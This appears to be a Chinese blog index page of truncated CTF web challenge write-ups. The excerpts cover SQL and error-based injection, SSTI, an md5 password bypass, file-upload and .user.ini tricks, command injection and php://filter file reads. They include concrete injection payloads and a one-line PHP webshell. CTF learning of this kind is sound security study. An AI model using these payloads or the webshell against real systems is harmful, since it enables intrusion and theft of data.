qq_42250840的博客

Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内容压缩编码类型。 Accept-Encoding: compress, gzip Accept-Language 浏览器可接受的语言 Accept-Language: en,zh Accep...

知识点： 报错注入 right/left(password,30) 从右/左读取30个字符 复现： 简单测试一下： 发现union被直接过滤掉了，不能使用双写绕过等方式，不过我们可以使用报错注入进行注入可以使用extractvalue和updatexml进行报错注入 先爆库名，构造： admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))# 查表： admin'or(updatexml(1,concat(0x7e,(select

知识点： WEB-INF/web.xml泄露 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件中 /WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB

知识点： ssti注入 ssti注入又称服务器端模板注入攻击(Server-Side Template Injection)，和sql注入一样，也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入，没有经过过滤或者说过滤不 严谨，将用户输入作为web应用模板的一部分，但是在进行编译渲染的过程中，执行了用户输入的恶意代码，造成信息泄露，代码执行，getshell等问题。 复现： 进去页面，随便输入一个数： 查看源码： 发现提示ssti注入，构造payload： {% for

知识点: password=’".md5($pass,true)."’ ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c，这个字符串前几位刚好是 ‘ or ‘6， 而 Mysql 刚好又会吧 hex 转成 ascii 解释，因此拼接之后的形式是1select * from ‘admin’ where password=’’ or ‘6xxxxx’ 等价于 or 一个永真式，因此相当于万能密码，可以绕过md5()函数 php弱类型

知识点： 一句话木马 <script language='php'> @eval($_POST['pass']);</script> 绕过后缀名检测 常用php,php3,php4,php5,phtml,pht绕过 文件类型绕过 改为Content-Type: image/jpeg 复现： 新建a.jpg，写入一句话木马： 上传： 改后缀名： 用菜刀连接： 找到flag ...

知识点： SSRF(Server-side Request Forge, 服务端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统. 复现： 扫描目录，发现robots.txt 访问： 发现源码泄露： 发现ssrf漏洞，其中用到的url就是我们注册时填写的blog 首先先注册登录，发现页面view.php?no=1存在注入 构造： view.php?no

知识点： linux的命令执行 当应用需要调用一些外部程序去处理内容的情况下，就会用到一些 执行系统命令的函数。如果用户可以控制命令执行函数中的参数时， 就可以注入一些恶意的系统命令到正常命令，造成命令执行漏洞 绕过空格、敏感字符、连接符 复现： 尝试?ip=127.0.0.1;ls 找到flag.php、index.php 尝试访问: ?ip=127.0.0.1 ;cat flag.php 空格被过滤， 1.%20(space)、%09(tab)、$IFS$9、 IFS、{IFS} 2.使用&l

知识点： 利用.user.ini上传\隐藏后门 .user.ini实际上就是一个可以由用户“自定义”的php.ini，我们可以自定义除了PHP_INI_SYSTEM以外的模式，在执行php代码之前，系统会对.user.ini先做一个执行，然后才执行其他的php文件。 利用.user,ini先执行auto_prepend_file函数，auto_prepend_file表示在php程序加载第一个php代码前加载的php文件，也就是先加载了a.jpg里面的文件，即一句话木马。 使用条件： (1)服务器脚本语

知识点： PHP的字符串解析特性 当php进行解析的时候，如果变量前面有空格，会去掉前面的空格再解析 复现： 查看源码，找到calc.php 存在过滤，不能传递字母变量，利用php解析特性，将“num”换为“ num”。再将chr转换为ascll进行绕过。由于查看目录，构造 ? num=1;var_dump(scandir(chr(47))) 存在flaag，构造 ? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97

知识点： 1、直接扫描目录得到网站源码 2、public、protected与private在序列化时的区别 3、__wakeup()方法绕过 复现： 首先根据提示网站备份文件，考虑扫描备份文件 首先我们需要一个网站备份文件的爆破字典 可以用脚本实现： import sys import imp imp.reload(sys) import os import os.path import requests from urllib.parse import unquote suffixList = ['.

考点： sql注入 复现： 进去之后我们试一下万能密码先 转到了check.php，告诉我们用户名和密码，但是并不是flag 考虑注入 先查询字段数： admin' order by 1 # admin' order by 2 # admin' order by 3 # admin' order by 4 # 到4的时候报错，一共有3个字段 接下来用union查询测试注入点： 1' union select 1,2,3 # 找到回显位置 查询数据库名 1' union select 1,2,da

考点： 文件包含漏洞，PHP伪协议获取文件 复现： 老规矩，点开页面，查看源码 找到信息页面，点击打开 反手一波源码 啥都没有，考虑页面停留时间太短 用burp抓包 得到一个secr3t.php 访问它 访问flag.php 反手查看源码，啥都没有… 想到前面的那段php代码，考虑是文件包含漏洞 用php://fileter来获取文件 得到base64源码 解码得到flag 总结： 利用文件包含漏洞与php伪协议结合 ...

打开网址查看源码 发现一段php，看样子是要求get传递cat并且值为dog 构造？cat=dog 直接得flag

注入题 直接万能钥匙 admin’or1=1#

圈重点：利用php://filter伪协议进行文件包含 不多说，按照提示点进去 看到这，考虑"php://input"伪协议 + POST发送PHP代码 题目对php://input 进行了过滤 那就再试试 “php://filter"伪协议” 来进行包含 构造Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php 成功读取源码： 解码得到flag： <?php echo "Can you find o